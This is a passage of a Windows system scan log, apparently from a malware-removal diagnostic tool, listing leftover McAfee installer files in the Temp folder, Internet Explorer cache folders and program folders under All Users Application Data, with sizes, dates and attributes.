C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\subinfo.dat ->  [Ver =  | Size = 2385 bytes | Modified Date = 2/12/2007 8:38:39 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\subinfo.dat ->  [Ver =  | Size = 2381 bytes | Modified Date = 2/12/2007 8:38:39 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\subinfo.dat ->  [Ver =  | Size = 2371 bytes | Modified Date = 2/12/2007 8:38:39 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mskuicfg.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\mskuicfg.dat ->  [Ver =  | Size = 265 bytes | Modified Date = 3/31/2006 10:59:40 AM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\subinfo.dat ->  [Ver =  | Size = 2361 bytes | Modified Date = 2/12/2007 8:38:39 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\subinfo.dat ->  [Ver =  | Size = 2357 bytes | Modified Date = 2/12/2007 8:38:39 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\subinfo.dat ->  [Ver =  | Size = 2385 bytes | Modified Date = 2/12/2007 8:54:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\subinfo.dat ->  [Ver =  | Size = 2381 bytes | Modified Date = 2/12/2007 8:54:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\subinfo.dat ->  [Ver =  | Size = 2371 bytes | Modified Date = 2/12/2007 8:54:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mskuicfg.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\mskuicfg.dat ->  [Ver =  | Size = 265 bytes | Modified Date = 3/31/2006 10:59:40 AM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\subinfo.dat ->  [Ver =  | Size = 2361 bytes | Modified Date = 2/12/2007 8:54:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
subinfo.dat -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\subinfo.dat ->  [Ver =  | Size = 2357 bytes | Modified Date = 2/12/2007 8:54:16 PM | Attr =    ]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
index.dat -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\index.dat ->  [Ver =  | Size = 65536 bytes | Modified Date = 7/1/2008 10:09:09 AM | Attr =    ]
C:\WINDOWS\Temp\ -> C:\WINDOWS\Temp ->  [Folder | Modified Date = 8/24/2008 7:13:36 PM | Attr =    ]
{AC76BA86-7AD7-1033-7B44-A81000000003}.ini -> C:\WINDOWS\Temp\{AC76BA86-7AD7-1033-7B44-A81000000003}.ini ->  [Ver =  | Size = 660 bytes | Modified Date = 8/15/2007 11:08:37 AM | Attr =    ]
30 C:\WINDOWS\Temp\*.tmp files -> C:\WINDOWS\Temp\*.tmp -> 
C:\WINDOWS\Temp\History\History.IE5\ -> C:\WINDOWS\Temp\History\History.IE5\ ->  [Folder | Modified Date = 12/24/2006 5:23:36 PM | Attr =  HS]
desktop.ini -> C:\WINDOWS\Temp\History\History.IE5\desktop.ini ->  [Ver =  | Size = 113 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
depend.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\depend.ini ->  [Ver =  | Size = 196 bytes | Modified Date = 5/23/2006 10:44:30 AM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\install.ini ->  [Ver =  | Size = 361 bytes | Modified Date = 4/20/2006 12:57:16 PM | Attr =    ]
master.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\master.ini ->  [Ver =  | Size = 234 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfp.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mpfp.ini ->  [Ver =  | Size = 189 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfp1.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mpfp1.ini ->  [Ver =  | Size = 3301 bytes | Modified Date = 11/28/2006 1:01:58 PM | Attr =    ]
mpfpcu.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mpfpcu.ini ->  [Ver =  | Size = 95 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfpcu1.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mpfpcu1.ini ->  [Ver =  | Size = 309 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
msc.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\msc.ini ->  [Ver =  | Size = 134 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
msc1.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\msc1.ini ->  [Ver =  | Size = 408 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
depend.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\depend.ini ->  [Ver =  | Size = 139 bytes | Modified Date = 3/29/2006 9:25:06 AM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\install.ini ->  [Ver =  | Size = 389 bytes | Modified Date = 5/4/2006 3:04:32 PM | Attr =    ]
master.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\master.ini ->  [Ver =  | Size = 228 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mps.ini ->  [Ver =  | Size = 494 bytes | Modified Date = 1/23/2007 5:23:04 PM | Attr =    ]
mps7.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mps7.ini ->  [Ver =  | Size = 3696 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps8.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mps8.ini ->  [Ver =  | Size = 3908 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps9.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mps9.ini ->  [Ver =  | Size = 1209 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps_un.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\mps_un.ini ->  [Ver =  | Size = 207 bytes | Modified Date = 6/28/2006 2:18:30 PM | Attr =    ]
shredder.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\shredder.ini ->  [Ver =  | Size = 702 bytes | Modified Date = 5/23/2006 1:18:54 PM | Attr =    ]
shred_un.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\shred_un.ini ->  [Ver =  | Size = 206 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\uninst.ini ->  [Ver =  | Size = 92817 bytes | Modified Date = 1/10/2007 1:41:26 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\install.ini ->  [Ver =  | Size = 302 bytes | Modified Date = 11/2/2006 8:27:30 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\install.ini ->  [Ver =  | Size = 387 bytes | Modified Date = 12/17/2006 4:38:40 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\install.ini ->  [Ver =  | Size = 382 bytes | Modified Date = 4/18/2006 12:38:40 PM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\uninst.ini ->  [Ver =  | Size = 92121 bytes | Modified Date = 1/10/2007 12:21:36 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\install.ini ->  [Ver =  | Size = 352 bytes | Modified Date = 6/26/2006 9:19:34 PM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\uninst.ini ->  [Ver =  | Size = 146818 bytes | Modified Date = 1/16/2007 12:32:02 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
depend.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\depend.ini ->  [Ver =  | Size = 196 bytes | Modified Date = 5/23/2006 10:44:30 AM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\install.ini ->  [Ver =  | Size = 361 bytes | Modified Date = 4/20/2006 12:57:16 PM | Attr =    ]
master.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\master.ini ->  [Ver =  | Size = 234 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfp.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mpfp.ini ->  [Ver =  | Size = 189 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfp1.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mpfp1.ini ->  [Ver =  | Size = 3301 bytes | Modified Date = 11/28/2006 1:01:58 PM | Attr =    ]
mpfpcu.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mpfpcu.ini ->  [Ver =  | Size = 95 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
mpfpcu1.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mpfpcu1.ini ->  [Ver =  | Size = 309 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
msc.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\msc.ini ->  [Ver =  | Size = 134 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
msc1.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\msc1.ini ->  [Ver =  | Size = 408 bytes | Modified Date = 5/23/2006 10:44:32 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
depend.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\depend.ini ->  [Ver =  | Size = 139 bytes | Modified Date = 3/29/2006 9:25:06 AM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\install.ini ->  [Ver =  | Size = 389 bytes | Modified Date = 5/4/2006 3:04:32 PM | Attr =    ]
master.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\master.ini ->  [Ver =  | Size = 228 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mps.ini ->  [Ver =  | Size = 494 bytes | Modified Date = 1/23/2007 5:23:04 PM | Attr =    ]
mps7.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mps7.ini ->  [Ver =  | Size = 3696 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps8.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mps8.ini ->  [Ver =  | Size = 3908 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps9.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mps9.ini ->  [Ver =  | Size = 1209 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
mps_un.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\mps_un.ini ->  [Ver =  | Size = 207 bytes | Modified Date = 6/28/2006 2:18:30 PM | Attr =    ]
shredder.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\shredder.ini ->  [Ver =  | Size = 702 bytes | Modified Date = 5/23/2006 1:18:54 PM | Attr =    ]
shred_un.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\shred_un.ini ->  [Ver =  | Size = 206 bytes | Modified Date = 6/15/2006 10:25:12 AM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\uninst.ini ->  [Ver =  | Size = 92817 bytes | Modified Date = 1/10/2007 1:41:26 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\install.ini ->  [Ver =  | Size = 302 bytes | Modified Date = 11/2/2006 8:27:30 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\install.ini ->  [Ver =  | Size = 387 bytes | Modified Date = 12/17/2006 4:38:40 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\install.ini ->  [Ver =  | Size = 382 bytes | Modified Date = 4/18/2006 12:38:40 PM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\uninst.ini ->  [Ver =  | Size = 92121 bytes | Modified Date = 1/10/2007 12:21:36 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
install.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\install.ini ->  [Ver =  | Size = 352 bytes | Modified Date = 6/26/2006 9:19:34 PM | Attr =    ]
uninst.ini -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\uninst.ini ->  [Ver =  | Size = 146818 bytes | Modified Date = 1/16/2007 12:32:02 PM | Attr =    ]
C:\WINDOWS\Temp\mcu10.tmp\vso\ -> C:\WINDOWS\Temp\mcu10.tmp\vso ->  [Folder | Modified Date = 1/15/2007 7:36:14 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu10.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 996 bytes | Modified Date = 1/15/2007 7:36:13 PM | Attr =    ]
C:\WINDOWS\Temp\mcu15.tmp\vso\ -> C:\WINDOWS\Temp\mcu15.tmp\vso ->  [Folder | Modified Date = 1/28/2007 8:57:46 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu15.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 998 bytes | Modified Date = 1/28/2007 8:57:46 PM | Attr =    ]
C:\WINDOWS\Temp\mcu16.tmp\vso\ -> C:\WINDOWS\Temp\mcu16.tmp\vso ->  [Folder | Modified Date = 1/25/2007 8:26:18 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu16.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 998 bytes | Modified Date = 1/25/2007 8:26:18 PM | Attr =    ]
C:\WINDOWS\Temp\mcu18.tmp\vso\ -> C:\WINDOWS\Temp\mcu18.tmp\vso ->  [Folder | Modified Date = 12/24/2006 5:57:22 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu18.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 996 bytes | Modified Date = 12/24/2006 5:57:22 PM | Attr =    ]
C:\WINDOWS\Temp\mcu1A.tmp\vso\ -> C:\WINDOWS\Temp\mcu1A.tmp\vso ->  [Folder | Modified Date = 1/14/2007 10:29:43 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu1A.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 996 bytes | Modified Date = 1/14/2007 10:29:42 PM | Attr =    ]
C:\WINDOWS\Temp\mcu1C.tmp\vso\ -> C:\WINDOWS\Temp\mcu1C.tmp\vso ->  [Folder | Modified Date = 1/30/2007 11:46:23 AM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu1C.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 998 bytes | Modified Date = 1/30/2007 11:46:23 AM | Attr =    ]
C:\WINDOWS\Temp\mcu1D.tmp\vso\ -> C:\WINDOWS\Temp\mcu1D.tmp\vso ->  [Folder | Modified Date = 1/20/2007 7:37:48 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu1D.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 997 bytes | Modified Date = 1/20/2007 7:37:48 PM | Attr =    ]
C:\WINDOWS\Temp\mcu21.tmp\ -> C:\WINDOWS\Temp\mcu21.tmp\ ->  [Folder | Modified Date = 12/24/2006 5:58:08 PM | Attr =    ]
AgentVer.ini -> C:\WINDOWS\Temp\mcu21.tmp\AgentVer.ini ->  [Ver =  | Size = 11725 bytes | Modified Date = 12/24/2006 5:24:33 PM | Attr =    ]
MSKVer.ini -> C:\WINDOWS\Temp\mcu21.tmp\MSKVer.ini ->  [Ver =  | Size = 7253 bytes | Modified Date = 12/24/2006 5:24:32 PM | Attr =    ]
C:\WINDOWS\Temp\mcu27.tmp\vso\ -> C:\WINDOWS\Temp\mcu27.tmp\vso ->  [Folder | Modified Date = 2/8/2007 9:11:55 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu27.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 995 bytes | Modified Date = 2/8/2007 9:11:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu28.tmp\vso\ -> C:\WINDOWS\Temp\mcu28.tmp\vso ->  [Folder | Modified Date = 2/12/2007 8:17:24 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu28.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 995 bytes | Modified Date = 2/12/2007 8:17:24 PM | Attr =    ]
C:\WINDOWS\Temp\mcu2E.tmp\vso\ -> C:\WINDOWS\Temp\mcu2E.tmp\vso ->  [Folder | Modified Date = 2/10/2007 3:38:56 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu2E.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 995 bytes | Modified Date = 2/10/2007 3:38:55 PM | Attr =    ]
C:\WINDOWS\Temp\mcu32.tmp\vso\ -> C:\WINDOWS\Temp\mcu32.tmp\vso ->  [Folder | Modified Date = 1/1/2007 9:34:11 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu32.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 995 bytes | Modified Date = 1/1/2007 9:34:10 PM | Attr =    ]
C:\WINDOWS\Temp\mcu66.tmp\vso\ -> C:\WINDOWS\Temp\mcu66.tmp\vso ->  [Folder | Modified Date = 2/5/2007 7:43:08 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu66.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 996 bytes | Modified Date = 2/5/2007 7:43:07 PM | Attr =    ]
C:\WINDOWS\Temp\mcu7F.tmp\vso\ -> C:\WINDOWS\Temp\mcu7F.tmp\vso ->  [Folder | Modified Date = 2/2/2007 2:52:04 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu7F.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 997 bytes | Modified Date = 2/2/2007 2:52:04 PM | Attr =    ]
C:\WINDOWS\Temp\mcu84.tmp\vso\ -> C:\WINDOWS\Temp\mcu84.tmp\vso ->  [Folder | Modified Date = 2/7/2007 4:04:24 PM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu84.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 995 bytes | Modified Date = 2/7/2007 4:04:23 PM | Attr =    ]
C:\WINDOWS\Temp\mcu96.tmp\vso\ -> C:\WINDOWS\Temp\mcu96.tmp\vso ->  [Folder | Modified Date = 2/2/2007 7:24:54 AM | Attr =    ]
mcdelta.ini -> C:\WINDOWS\Temp\mcu96.tmp\vso\mcdelta.ini ->  [Ver =  | Size = 998 bytes | Modified Date = 2/2/2007 7:24:53 AM | Attr =    ]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\ ->  [Folder | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\8TSZOHSN\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\8TSZOHSN ->  [Folder | Modified Date = 2/12/2007 9:46:45 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\8TSZOHSN\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P ->  [Folder | Modified Date = 2/12/2007 9:19:20 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\OH2XMB6P\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\OH2XMB6P ->  [Folder | Modified Date = 2/12/2007 9:46:50 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\OH2XMB6P\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\S12LSDAT\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\S12LSDAT ->  [Folder | Modified Date = 2/12/2007 8:53:31 PM | Attr =   S]
desktop.ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\S12LSDAT\desktop.ini ->  [Ver =  | Size = 67 bytes | Modified Date = 12/4/2006 7:45:53 PM | Attr =  HS]
mcltvers[1].ini -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\S12LSDAT\mcltvers[1].ini ->  [Ver =  | Size = 2657 bytes | Modified Date = 12/10/2006 6:34:33 PM | Attr =    ]

[File - Lop Check: Additional Folder Scans - Non-Microsoft Only]
Application Data -> C:\Documents and Settings\All Users\Application Data ->  [Folder | Modified Date = 8/22/2008 7:48:47 PM | Attr = RH ]
Adobe -> C:\Documents and Settings\All Users\Application Data\Adobe ->  [Folder | Modified Date = 2/24/2008 7:22:50 PM | Attr =    ]
AOL -> C:\Documents and Settings\All Users\Application Data\AOL ->  [Folder | Modified Date = 5/23/2008 9:56:18 PM | Attr =    ]
AOL Downloads -> C:\Documents and Settings\All Users\Application Data\AOL Downloads ->  [Folder | Modified Date = 5/23/2008 9:53:07 PM | Attr =    ]
AOL OCP -> C:\Documents and Settings\All Users\Application Data\AOL OCP ->  [Folder | Modified Date = 5/23/2008 9:54:17 PM | Attr =    ]
Corel -> C:\Documents and Settings\All Users\Application Data\Corel ->  [Folder | Modified Date = 11/28/2006 1:06:58 PM | Attr =    ]
CyberLink -> C:\Documents and Settings\All Users\Application Data\CyberLink ->  [Folder | Modified Date = 11/28/2006 1:19:53 PM | Attr =    ]
Dell -> C:\Documents and Settings\All Users\Application Data\Dell ->  [Folder | Modified Date = 2/16/2008 9:04:40 PM | Attr =    ]
DIGStream -> C:\Documents and Settings\All Users\Application Data\DIGStream ->  [Folder | Modified Date = 8/16/2005 7:54:52 PM | Attr =    ]
espionServerData -> C:\Documents and Settings\All Users\Application Data\espionServerData ->  [Folder | Modified Date = 2/17/2008 7:47:41 PM | Attr =    ]
FLEXnet -> C:\Documents and Settings\All Users\Application Data\FLEXnet ->  [Folder | Modified Date = 3/20/2008 12:58:31 AM | Attr =    ]
Google -> C:\Documents and Settings\All Users\Application Data\Google ->  [Folder | Modified Date = 11/28/2006 1:17:05 PM | Attr =    ]
Google Updater -> C:\Documents and Settings\All Users\Application Data\Google Updater ->  [Folder | Modified Date = 8/23/2008 6:54:49 PM | Attr =    ]
GTek -> C:\Documents and Settings\All Users\Application Data\GTek ->  [Folder | Modified Date = 11/28/2006 1:19:15 PM | Attr =    ]
InstallShield -> C:\Documents and Settings\All Users\Application Data\InstallShield ->  [Folder | Modified Date = 11/28/2006 1:10:34 PM | Attr =    ]
Intel -> C:\Documents and Settings\All Users\Application Data\Intel ->  [Folder | Modified Date = 9/24/2007 9:23:07 AM | Attr =    ]
Macromedia -> C:\Documents and Settings\All Users\Application Data\Macromedia ->  [Folder | Modified Date = 5/23/2008 9:56:23 PM | Attr =    ]
McAfee -> C:\Documents and Settings\All Users\Application Data\McAfee ->  [Folder | Modified Date = 8/18/2008 6:03:15 PM | Attr =    ]
McAfee.com -> C:\Documents and Settings\All Users\Application Data\McAfee.com ->  [Folder | Modified Date = 2/17/2007 7:16:05 PM | Attr =    ]
